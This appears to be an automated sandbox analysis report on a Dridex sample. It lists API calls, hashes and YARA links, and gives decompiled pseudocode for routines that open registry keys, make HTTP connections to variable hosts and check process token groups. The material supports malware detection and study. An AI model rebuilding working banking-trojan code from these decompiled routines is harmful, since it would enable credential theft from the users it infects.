Opcode Fuzzy Hash: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
Instruction Fuzzy Hash: 06E07D31645204ABE650AFA1EE0EB5D7F68AB04703F1040B5FB0AB91F4CA745A008B69

Uniqueness

Uniqueness Score: -1.00%

Function 00401D60, Relevance: 10.5, APIs: 7, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00401D67
GetCommandLineA.KERNEL32 ref: 00401D7B
CreateCompatibleDC.GDI32(00000000), ref: 00401D8B
GetACP.KERNEL32 ref: 00401DA1
GetEnvironmentStrings.KERNEL32 ref: 00401DA7
GetDateFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401DC3
HeapReAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402879

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CommandLine$AllocCompatibleCreateDateEnvironmentFormatHeapStrings
String ID:
API String ID: 3564124098-0
Opcode ID: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
Instruction ID: af9d4de3cf86c2f6b80bec87d207abd21e06541653e40ff6df8a1295e72425d5
Opcode Fuzzy Hash: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
Instruction Fuzzy Hash: 15F0077529A240EBE2507FA1EF0EB087E3CAB04B43F1041B5F306B91F58AB457448B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401DDF, Relevance: 7.5, APIs: 5, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32 ref: 00401DE7
HeapDestroy.KERNEL32(00000000), ref: 00401DEF
SetStdHandle.KERNEL32(00000000,00000000), ref: 00401E09
FlushFileBuffers.KERNEL32(00000000), ref: 00401E11

Part of subcall function 00401E70: #6215.MFC42(00000000), ref: 00401E85

#2379.MFC42 ref: 00401E26

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #2379#6215BuffersDestroyFileFlushHandleHeap
String ID:
API String ID: 3744095458-0
Opcode ID: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
Instruction ID: 8831d63713359388988f6f63f2f7d58f073549cc635a453978b6df9dfabe448d
Opcode Fuzzy Hash: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
Instruction Fuzzy Hash: 06E07D31645204ABE650AFA1EE0EB5D7F68AB04703F1040B5FB0AB91F4CA745A008B69

Uniqueness

Uniqueness Score: -1.00%

Function 00401240, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 7COMMON

Download Yara Rule

APIs

#446.MFC42(00403380,8P@,00000001,WordAutomation.Application,00401235), ref: 00401256

Strings

o@, xrefs: 00401251
WordAutomation.Application, xrefs: 00401240
8P@, xrefs: 00401247

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: #446
String ID: 8P@$WordAutomation.Application$o@
API String ID: 3291608302-24086771
Opcode ID: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
Instruction ID: 23b2b5def2a953660c0bbce8edcddb18257bcf876159122dd0a38a8143af38d3
Opcode Fuzzy Hash: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
Instruction Fuzzy Hash: C4B012203C030130DD1429010C43F4A08055340F05DA0407FB7023C0C18CFE0254008C

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0, Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

#324.MFC42(00000066,00000000,?,?,00000000,00402718,000000FF,00401460,00000000), ref: 004015E4
#1168.MFC42(00000066,00000000,?,?,00000000), ref: 004015F7
#1146.MFC42(00000080,0000000E,00000080,00000066,00000000,?,?,00000000), ref: 00401608
LoadIconA.USER32(00000000,00000080), ref: 0040160E

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: #1146#1168#324IconLoad
String ID:
API String ID: 193567849-0
Opcode ID: af2a4761585203f4bec0e87f8bd8e8a73c99d675b7b2cd13ce05c823f6c019d7
Instruction ID: 718a584e9d37f4746e91c8a82ad397b6e7f3e9142889a7192b32e25e0e426896
Opcode Fuzzy Hash: af2a4761585203f4bec0e87f8bd8e8a73c99d675b7b2cd13ce05c823f6c019d7
Instruction Fuzzy Hash: A9F054B1644750ABE310DF59CA06B06BBD8FB44B10F004A2EF595B77C0C7FD54048B55

Uniqueness

Uniqueness Score: -1.00%

Function 00401080, Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

#290.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 0040109D
#2623.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 004010B2
#1206.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 004010B7
#1168.MFC42(?,00000000,00000000,004026B8,000000FF,00401037), ref: 004010BC

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #1168#1206#2623#290
String ID:
API String ID: 2814418969-0
Opcode ID: c1b2bb519df6d6a38c27ec1491882f25e6dcda16a4c0156bc26f718283f4215e
Instruction ID: ecd3140fac416fe4891ce4795e697a4ea0f3ddb15ac72dfb7578db4491d0a0dd
Opcode Fuzzy Hash: c1b2bb519df6d6a38c27ec1491882f25e6dcda16a4c0156bc26f718283f4215e
Instruction Fuzzy Hash: 3DF08274500650DFC314EF08C605B097BE8FB08B10F004A6FF444AB7C1C7BC88408B95

Uniqueness

Uniqueness Score: -1.00%

Function 00401240, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

#446.MFC42(00403380,8P@,00000001,00405054,00401235), ref: 00401256

Strings

o@, xrefs: 00401251
8P@, xrefs: 00401247

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #446
String ID: 8P@$o@
API String ID: 3291608302-1213915778
Opcode ID: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
Instruction ID: 23b2b5def2a953660c0bbce8edcddb18257bcf876159122dd0a38a8143af38d3
Opcode Fuzzy Hash: 6d89bb63c30bdc4a857ca23dcafdc35bd528b75dd9dda83e25fddc2dda30a4cb
Instruction Fuzzy Hash: C4B012203C030130DD1429010C43F4A08055340F05DA0407FB7023C0C18CFE0254008C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Dridex.exe PID: 6660 Parent PID: 6616 Dridex.exeCOMMON

Executed Functions

Function 00404E70, Relevance: 3.2, APIs: 2, Instructions: 243
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404E70(void** __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v4;
				char _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				void** _v40;
				char _v44;
				char _v48;
				void** _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				int _v88;
				void* _v92;
				char _v96;
				intOrPtr _v100;
				void** _v104;
				void** _v108;
				void** _v112;
				intOrPtr _v116;
				long _v120;
				long _v124;
				void* _v128;
				void* _v132;
				void* _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t93;
				intOrPtr _t94;
				void* _t96;
				void* _t104;
				long _t108;
				intOrPtr* _t110;
				intOrPtr* _t118;
				intOrPtr* _t122;
				void* _t125;
				long _t130;
				intOrPtr _t150;
				void* _t153;
				char* _t154;
				intOrPtr _t160;
				long _t174;
				long _t176;
				void** _t184;
				intOrPtr _t185;
				void* _t186;
				int _t188;
				char* _t190;
				void** _t191;
				void* _t192;
				void* _t193;

				_t192 =  &_v96;
				_t184 = __ecx;
				_t150 = _a8;
				_t172 = _a4;
				 *((intOrPtr*)(__ecx)) = _a12;
				_t187 = __ecx + 8;
				_t93 =  *(__ecx + 8);
				 *((intOrPtr*)(__ecx + 0x10)) = _t150;
				if(_t93 != _a4) {
					E0040EA50(_t187, _t172, 0);
					_t93 = _t184[2];
				}
				_push(0x2f);
				_push(_t93);
				_t94 = E00404DC0();
				_t193 = _t192 + 8;
				if(_t94 == 0) {
					_t191 = 0;
					E0040E710( &_v56, _t172, _t187);
					L11:
					_t96 = E00405240( &_v56);
					_push(0x5c);
					E00405180(_t96, _t187,  &_v36);
					E0040DEA0(_t150,  &_v64, _t184);
					E0040BAB4(_v52);
					_t102 = _v44;
					_v52 = _t191;
					_v48 = _t191;
					if(_v44 != _t184[2]) {
						E0040EA50(_t187, _t102, 0);
						_t102 = _v48;
					}
					E0040BAB4(_t102);
					_t104 = _t184[1];
					_v40 = _t191;
					_v36 = _t191;
					if(_t104 != 0 && _t104 != 0xffffffff) {
						E0040BA8C(_t104, _t187, _t104);
					}
					_t184[1] = 0;
					if(_t150 == 1 || _t150 == 2) {
						_t188 = 0x2010b;
					} else {
						_t188 = 0x20109;
					}
					_v32 = 0;
					E0040E4B4(0xb9, _t188);
					_t108 = RegOpenKeyExA( *_t184, _t184[2], 0, _t188,  &_v32); // executed
					_t174 = _t108;
					if(_t174 == 2) {
						if(_t150 == 2) {
							_v88 = 0;
							_t110 = E0040E4B4(0xbd, _t188);
							E00408B38( &_v96, 1);
							 *_t110(_v96, 1,  &_v88, 0);
							E0040BAB4(_v112);
							_t176 =  *0x40f028; // 0xc
							_t160 =  *0x40f030; // 0x0
							_v112 = _t191;
							_v108 = _t191;
							_v124 = _t176;
							_v116 = _t160;
							_v120 = _v104;
							_t118 = E0040E4B4(0xb5, _t188);
							_v116 =  *_t118( *_t184, _t184[2], _t191, _t191, _t191, _t188,  &_v124,  &_v48, _t191);
							_t122 = E0040E4B4(0x62, _t188);
							 *_t122( *((intOrPtr*)(_t193 + 0x1c)));
							_t174 = _v120;
						} else {
							E0040E4B4(0xb9, _t188);
							_t130 = RegOpenKeyExA( *_t184, _t184[2], 0, _t188,  &_v32); // executed
							_t174 = _t130;
						}
					}
					_t153 = _v88;
					if(_t153 != 0) {
						_t125 = _t184[1];
						if(_t125 == 0 || _t125 == 0xffffffff) {
							_t184[1] = _t153;
						} else {
							_v120 = _t174;
							E0040BA8C(_t125, _t188, _t125);
							_t174 = _v124;
							_t184[1] = _t153;
						}
					}
					return _t174;
				}
				_t191 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v96 = _t94;
				E0040E280( &_v68, _t187, 0);
				_t154 =  &_v84;
				_v104 = _t187;
				_t190 = _t184[2];
				_v108 = _t184;
				_t185 = _v100;
				do {
					_v24 = _t191;
					_t186 = _t185 - _t190;
					 *((intOrPtr*)(_t193 + 0x5c)) = _t191;
					if(_t186 == 0) {
						E0040E280( &_v24, _t190, 0);
					} else {
						E0040EA50( &_v24, _t190, _t186);
					}
					E0040E200(_t154, _v24);
					E0040BAB4(_v28);
					_v28 = _t191;
					_t190 =  &(_t190[_t186 + 1]);
					_v24 = _t191;
					_push(0x2f);
					_push(_t190);
					_t185 = E00404DC0();
					_t193 = _t193 + 8;
				} while (_t185 != 0);
				_t187 = _v100;
				_t184 = _v104;
				_t150 = _a8;
				E0040E200( &_v80, _t190);
				_v60 = _t191;
				_v56 = _t191;
				_v52 = _t191;
				_v48 = _t191;
				_v44 = _t191;
				E0040E280( &_v48, _v100, _t191);
				if( &_v88 !=  &_v64) {
					_push( &_v80);
					E00409F80(_t150,  &_v56);
				}
				E0040DEA0(_t150,  &_v80, _t184);
				E0040BAB4(_v68);
				_v68 = _t191;
				_v64 = _t191;
				goto L11;
			}

0x00404e74
0x00404e77
0x00404e7d
0x00404e81
0x00404e85
0x00404e87
0x00404e8a
0x00404e8f
0x00404e92
0x00404e99
0x00404e9e
0x00404e9e
0x00404ea1
0x00404ea3
0x00404ea4
0x00404ea9
0x00404eae
0x0040516a
0x00405170
0x00404fae
0x00404fb2
0x00404fbd
0x00404fc0
0x00404fc9
0x00404fd2
0x00404fd7
0x00404fdb
0x00404fdf
0x00404fe6
0x00404fed
0x00404ff2
0x00404ff2
0x00404ff6
0x00404ffb
0x00405000
0x00405004
0x00405008
0x00405010
0x00405010
0x00405015
0x0040501f
0x0040502d
0x00405026
0x00405026
0x00405026
0x00405037
0x0040503f
0x00405053
0x00405055
0x0040505a
0x00405095
0x004050c7
0x004050cf
0x004050df
0x004050f1
0x004050f7
0x004050fc
0x00405107
0x00405111
0x00405115
0x00405119
0x0040511d
0x00405121
0x00405125
0x00405149
0x0040514d
0x0040515e
0x00405160
0x00405097
0x0040509c
0x004050bc
0x004050be
0x004050be
0x00405095
0x0040505c
0x00405062
0x00405064
0x00405069
0x0040508d
0x00405070
0x00405071
0x00405075
0x0040507a
0x0040507e
0x0040507e
0x00405069
0x0040508a
0x0040508a
0x00404eb4
0x00404eb6
0x00404eba
0x00404ebe
0x00404ec2
0x00404ec6
0x00404ecb
0x00404ed3
0x00404edc
0x00404ee3
0x00404ee7
0x00404ee9
0x00404eed
0x00404eef
0x00404eef
0x00404ef3
0x00404ef5
0x00404ef9
0x00404f0e
0x00404efb
0x00404f01
0x00404f01
0x00404f19
0x00404f22
0x00404f27
0x00404f2b
0x00404f2f
0x00404f33
0x00404f35
0x00404f3b
0x00404f3d
0x00404f40
0x00404f46
0x00404f4a
0x00404f4e
0x00404f57
0x00404f5c
0x00404f60
0x00404f64
0x00404f68
0x00404f6c
0x00404f75
0x00404f84
0x00404f8a
0x00404f8f
0x00404f8f
0x00404f98
0x00404fa1
0x00404fa6
0x00404faa
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,0002010B,00000000), ref: 00405053
RegOpenKeyExA.KERNELBASE(?,?,00000000,0002010B,00000000), ref: 004050BC

Part of subcall function 0040BA8C: RegCloseKey.KERNELBASE(00000000,0002010B,?,0040507A,00000000), ref: 0040BA9B

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Close
String ID:
API String ID: 3083169812-0
Opcode ID: 19371cce9a55844af04d65ca323a99e56dcb63b54544c5e1e035a03b719da0dd
Instruction ID: cd89e72e798a852671a518b10a10e0bc67fe3e59a4973e81a71b1982d664136a
Opcode Fuzzy Hash: 19371cce9a55844af04d65ca323a99e56dcb63b54544c5e1e035a03b719da0dd
Instruction Fuzzy Hash: 80914871608705ABC310EF56C880A5BFBE4EFC4744F10892EF595A7291DB39E815CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A040, Relevance: 3.2, APIs: 2, Instructions: 205
networkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A040(void* __ecx, intOrPtr* _a4) {
				void* _v44;
				void* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				char _v60;
				char _v64;
				void* _v68;
				WCHAR* _v84;
				char _v88;
				WCHAR* _v92;
				void* _v96;
				WCHAR* _v100;
				signed int _v104;
				WCHAR* _v112;
				WCHAR* _v116;
				WCHAR* _v120;
				WCHAR* _v124;
				WCHAR* _v128;
				WCHAR* _v132;
				char _v136;
				void* _v140;
				WCHAR* _v144;
				WCHAR* _v148;
				WCHAR* _v156;
				void* _v160;
				void* _v164;
				char _v168;
				void* _v180;
				void* _v212;
				void* __edi;
				void* __esi;
				char* _t91;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t107;
				void* _t108;
				void* _t111;
				intOrPtr* _t119;
				intOrPtr* _t123;
				void* _t135;
				void* _t136;
				intOrPtr _t144;
				short _t154;
				void* _t156;
				void* _t158;
				void* _t159;
				void* _t160;
				char* _t161;
				WCHAR** _t163;

				_t163 =  &_v92;
				_t136 = __ecx;
				_push( *_a4);
				E0040A450( &_v100);
				_t154 = _v104;
				_v60 = 0;
				_v56 = 0;
				E0040E060( &_v60, _t156, 0);
				E0040A358( &_v56);
				E0040A358( &_v48);
				_t157 = E0040E340( &_v64, _t154, _t156, _v48);
				E0040A358( &_v44);
				E0040E340(_t83, _t154, _t83, _v44);
				E0040BAB4(_v48);
				_v48 = 0;
				_v44 = 0;
				E0040BAB4(_v56);
				_t91 = _v112;
				_v56 = 0;
				_v52 = 0;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t135 = E0040C700( &_v100);
					if(_t135 != 0x97780db2) {
						if(_t135 == 0x3ef665a6) {
							 *((intOrPtr*)(_t136 + 0xc)) = 1;
						}
					} else {
						 *((intOrPtr*)(_t136 + 0xc)) = 0;
					}
				}
				E0040E4B4(0x13a, _t157);
				_t94 =  *0x416c24; // 0xffffffff
				_t95 = InternetConnectW(_t94, _v52, _t154, 0, 0, 3, 0, 0); // executed
				_t158 = _t95;
				_t96 =  *(_t136 + 4);
				if(_t96 != 0 && _t96 != 0xffffffff) {
					_t96 = E0040AF54(_t96, _t158, _t96);
				}
				 *(_t136 + 4) = _t158;
				if(_t158 == 0 || _t158 == 0xffffffff) {
					E0040EAB0();
					 *(_t136 + 0x3c) = _t96;
					E0040BAB4(_v84);
					_v84 = 0;
					_t163[0x10] = 0;
					E0040BAB4(_v92);
					_v92 = 0;
					_v88 = 0;
					E0040A300( &_v136);
					return 0;
				} else {
					if( *((intOrPtr*)(_t136 + 0xc)) == 1) {
						_v56 = 0x803200;
					} else {
						_v56 = 0x3200;
					}
					E0040E4B4(0x13e, _t158);
					_t159 =  *(_t136 + 4);
					if( *((intOrPtr*)(_t136 + 0x10)) == 1) {
						E00408B38( &_v100, 0xc);
					} else {
						E00408B38( &_v100, 0xb);
					}
					_t107 = HttpOpenRequestW(_t159, _v100, _v92, 0, 0, 0, _v56, 0); // executed
					_t160 = _t107;
					_t108 =  *(_t136 + 8);
					if(_t108 != 0 && _t108 != 0xffffffff) {
						E0040AF54(_t108, _t160, _t108);
					}
					 *(_t136 + 8) = _t160;
					E0040BAB4(_v132);
					_t111 =  *(_t136 + 8);
					_v132 = 0;
					_v128 = 0;
					if(_t111 == 0 || _t111 == 0xffffffff) {
						E0040EAB0();
						 *(_t136 + 0x3c) = _t111;
						E0040BAB4(_v116);
						_v116 = 0;
						_v112 = 0;
						E0040BAB4(_v124);
						_v124 = 0;
						_v120 = 0;
						E0040A300( &_v168);
						return 0;
					} else {
						_t144 =  *0x416c28; // 0x21436587
						if(_t144 != 0x21436587) {
							E0040A760(_t144, _t111);
						}
						_v92 = 4;
						_t119 = E0040E4B4(0x142, _t160);
						_t161 =  &_v88;
						 *_t119( *(_t136 + 8), 0x1f, _t161,  &_v92);
						_v104 = _v104 | 0x00000100;
						_t123 = E0040E4B4(0x144, _t161);
						 *_t123( *(_t136 + 8), 0x1f, _t161, _t163[0x15]);
						E0040BAB4(_v148);
						_v148 = 0;
						_v144 = 0;
						E0040BAB4(_v156);
						_v156 = 0;
						_t163[0xe] = 0;
						E0040A300( &(_t163[2]));
						return 1;
					}
				}
			}

0x0040a044
0x0040a047
0x0040a04d
0x0040a053
0x0040a05a
0x0040a05e
0x0040a062
0x0040a06b
0x0040a078
0x0040a085
0x0040a097
0x0040a0a1
0x0040a0ac
0x0040a0b5
0x0040a0be
0x0040a0c2
0x0040a0c6
0x0040a0cb
0x0040a0d1
0x0040a0d5
0x0040a0d9
0x0040a0e4
0x0040a0ee
0x0040a0fe
0x0040a100
0x0040a100
0x0040a0f0
0x0040a0f0
0x0040a0f0
0x0040a0ee
0x0040a10c
0x0040a11e
0x0040a124
0x0040a126
0x0040a128
0x0040a12d
0x0040a135
0x0040a135
0x0040a13a
0x0040a13f
0x0040a2bf
0x0040a2c4
0x0040a2cb
0x0040a2d4
0x0040a2d8
0x0040a2dc
0x0040a2e1
0x0040a2e9
0x0040a2ed
0x0040a2fb
0x0040a14e
0x0040a152
0x0040a15e
0x0040a154
0x0040a154
0x0040a154
0x0040a16b
0x0040a172
0x0040a179
0x0040a2b5
0x0040a17f
0x0040a188
0x0040a188
0x0040a19e
0x0040a1a0
0x0040a1a2
0x0040a1a7
0x0040a1af
0x0040a1af
0x0040a1b8
0x0040a1bb
0x0040a1c0
0x0040a1c5
0x0040a1c9
0x0040a1cd
0x0040a26d
0x0040a272
0x0040a279
0x0040a282
0x0040a286
0x0040a28a
0x0040a28f
0x0040a297
0x0040a29b
0x0040a2a9
0x0040a1dc
0x0040a1dc
0x0040a1e8
0x0040a1eb
0x0040a1eb
0x0040a1f5
0x0040a1fd
0x0040a208
0x0040a213
0x0040a21a
0x0040a222
0x0040a231
0x0040a237
0x0040a240
0x0040a244
0x0040a248
0x0040a24d
0x0040a255
0x0040a259
0x0040a26a
0x0040a26a
0x0040a1cd

APIs

Part of subcall function 0040BAB4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040BAFC

InternetConnectW.WININET(FFFFFFFF,?,?,00000000,00000000,00000003,00000000,00000000,?,?,00000000,?,?,?,?,00000000), ref: 0040A124
HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,?,00000000), ref: 0040A19E

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

API ID: ConnectFreeHeapHttpInternetOpenRequest
String ID:
API String ID: 3083932-0
Opcode ID: 53dab6feaeffabdf5c727b88feeedd516d6e8ac6a1d0f717d65df5a5bd771d52
Instruction ID: 8b35432c8cfbd76ae66fb188e58f661d7ddd40942ed190704566a1478e6e8553
Opcode Fuzzy Hash: 53dab6feaeffabdf5c727b88feeedd516d6e8ac6a1d0f717d65df5a5bd771d52
Instruction Fuzzy Hash: AB716E705043449FC740EF66C880A0BBBF4EF85718F14892EF598AA392DB79D855CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00402080, Relevance: 3.2, APIs: 2, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402080(char __edi) {
				char _v12;
				void* _v24;
				long _v28;
				long _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v60;
				long _v64;
				char _v68;
				char _v72;
				void* _v76;
				char _v84;
				int _v88;
				char _v92;
				void* _v96;
				void* _v104;
				void* _v120;
				void* _v128;
				void* __esi;
				intOrPtr* _t44;
				int _t47;
				int _t54;
				int _t57;
				int* _t61;
				int _t68;
				int _t69;
				intOrPtr* _t75;
				int _t76;
				int _t77;
				int _t84;
				int _t92;
				intOrPtr _t102;
				char _t105;
				int* _t106;
				void* _t109;
				signed int _t110;
				intOrPtr* _t111;
				int* _t113;
				int _t114;
				void* _t115;

				_t105 = __edi;
				_t115 =  &_v52;
				_v12 = 0;
				_t44 = E0040E4B4(0xb0, _t109);
				_t111 = _t44;
				if(_t111 == 0) {
					L7:
					return 0;
				} else {
					E004081C0();
					_t47 =  *_t111(_t44, 8,  &_v12);
					if(_t47 == 0) {
						E0040EAB0();
						__eflags = _t47;
						if(_t47 != 0) {
							goto L7;
						} else {
							goto L2;
						}
					} else {
						L2:
						_v36 = _v24;
						_v32 = 1;
						_v28 = 0;
						if(E0040E4B4(0xae, _t109) != 0) {
							_t84 = GetTokenInformation(_v24, 2, 0, 0,  &_v28); // executed
							if(_t84 == 0) {
								E0040EAB0();
							}
						}
						_t51 = _v28;
						if(_v28 != 0) {
							E00407450( &_v68, _t51);
							_t54 = E0040E4B4(0xae, _t109);
							__eflags = _t54;
							if(_t54 != 0) {
								_t57 = GetTokenInformation(_v28, 2, E00409700( &_v68, 0), _v64,  &_v32); // executed
								__eflags = _t57;
								if(_t57 == 0) {
									E0040EAB0();
									__eflags = _t57;
									if(_t57 != 0) {
										goto L9;
									} else {
										goto L13;
									}
								} else {
									L13:
									_t110 = 0;
									_t61 = E00409700( &_v72, 0);
									_t102 =  *0x40f020; // 0x0
									_t113 = _t61;
									_v48 = 0;
									_v60 = _t102;
									 *((short*)(_t115 + 0x18)) =  *0x40f024 & 0x0000ffff;
									_t92 = E0040E4B4(0x98, 0);
									__eflags = _t92;
									if(_t92 == 0) {
										L26:
										E0040AE90( &_v72, _t110);
										__eflags = _v36;
										if(__eflags != 0) {
											E00408190( &_v40, _t110, __eflags);
										}
										__eflags = 0;
										return 0;
									} else {
										_t68 =  *_t92(_t115 + 0x14, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v44);
										__eflags = _t68;
										if(_t68 == 0) {
											E0040EAB0();
											__eflags = _t68;
											if(_t68 != 0) {
												goto L26;
											} else {
												goto L15;
											}
										} else {
											L15:
											_t69 = _v88;
											__eflags =  *_t113;
											if( *_t113 <= 0) {
												L20:
												__eflags = _t69;
												if(_t69 != 0) {
													__eflags = _t69 - 0xffffffff;
													if(_t69 != 0xffffffff) {
														E004022D4(_t69, _t110, _t69);
													}
												}
												E0040AE90(_t115 + 4, _t110);
												__eflags =  *((char*)(_t115 + 0x28));
												if(__eflags != 0) {
													E00408190( &_v84, _t110, __eflags);
												}
												__eflags = 0;
												return 0;
											} else {
												_v92 = _t105;
												_t106 = _t113;
												_t114 = _t69;
												while(1) {
													_t75 = E0040E4B4(0xaa, _t110);
													_t76 =  *_t75(_v88,  *((intOrPtr*)(_t106 + 4 + _t110 * 8)));
													__eflags = _t76;
													if(_t76 != 0) {
														break;
													}
													_t110 = _t110 + 1;
													__eflags = _t110 -  *_t106;
													if(_t110 <  *_t106) {
														continue;
													} else {
														_t69 = _t114;
														goto L20;
													}
													goto L42;
												}
												_t77 = _t114;
												__eflags = _t77;
												if(_t77 != 0) {
													__eflags = _t77 - 0xffffffff;
													if(_t77 != 0xffffffff) {
														E004022D4(_t77, _t110, _t77);
													}
												}
												E0040AE90(_t115 + 4, _t110);
												__eflags = _v88;
												if(__eflags != 0) {
													E00408190( &_v92, _t110, __eflags);
												}
												return 1;
											}
										}
									}
								}
							} else {
								L9:
								E0040AE90( &_v72, _t109);
								__eflags = _v36;
								if(__eflags != 0) {
									E00408190( &_v40, _t109, __eflags);
								}
								__eflags = 0;
								return 0;
							}
						} else {
							_t121 = _v32;
							if(_v32 != 0) {
								E00408190( &_v36, _t109, _t121);
							}
							goto L7;
						}
					}
				}
				L42:
			}

0x00402080
0x00402082
0x0040208a
0x00402092
0x00402097
0x0040209b
0x0040210c
0x00402113
0x0040209d
0x0040209d
0x004020ac
0x004020b0
0x004022be
0x004022c3
0x004022c5
0x00000000
0x004022cb
0x00000000
0x004022cb
0x004020b6
0x004020b6
0x004020ba
0x004020c3
0x004020c8
0x004020d9
0x004020ea
0x004020ee
0x004022b4
0x004022b4
0x004020ee
0x004020f4
0x004020fa
0x00402119
0x00402123
0x0040212a
0x0040212c
0x0040216c
0x0040216e
0x00402170
0x004022a2
0x004022a7
0x004022a9
0x00000000
0x004022af
0x00000000
0x004022af
0x00402176
0x00402176
0x00402176
0x0040217d
0x00402182
0x00402188
0x00402196
0x0040219a
0x0040219e
0x004021a8
0x004021aa
0x004021ac
0x0040223a
0x0040223e
0x00402243
0x00402248
0x0040224e
0x0040224e
0x00402253
0x0040225a
0x004021b2
0x004021cb
0x004021cd
0x004021cf
0x00402294
0x00402299
0x0040229b
0x00000000
0x0040229d
0x00000000
0x0040229d
0x004021d5
0x004021d5
0x004021d5
0x004021d9
0x004021dd
0x0040220a
0x0040220a
0x0040220c
0x0040220e
0x00402211
0x00402214
0x00402214
0x00402211
0x0040221d
0x00402222
0x00402227
0x0040222d
0x0040222d
0x00402232
0x00402239
0x004021df
0x004021df
0x004021e3
0x004021e5
0x004021e7
0x004021ec
0x004021f9
0x004021fb
0x004021fd
0x00000000
0x00000000
0x004021ff
0x00402200
0x00402202
0x00000000
0x00402204
0x00402208
0x00000000
0x00402208
0x00000000
0x00402202
0x0040225b
0x00402261
0x00402263
0x00402265
0x00402268
0x0040226b
0x0040226b
0x00402268
0x00402274
0x00402279
0x0040227e
0x00402284
0x00402284
0x00402293
0x00402293
0x004021dd
0x004021cf
0x004021ac
0x0040212e
0x0040212e
0x00402132
0x00402137
0x0040213c
0x00402142
0x00402142
0x00402147
0x0040214e
0x0040214e
0x004020fc
0x004020fc
0x00402101
0x00402107
0x00402107
0x00000000
0x00402101
0x004020fa
0x004020b0
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000), ref: 004020EA
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,00000000,00000000,00000000), ref: 0040216C

Part of subcall function 00408190: FindCloseChangeNotification.KERNELBASE(?,?,00000001,0040E9D8,?,004017A2,00000000), ref: 004081A7

Memory Dump Source

Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp Download File

Similarity

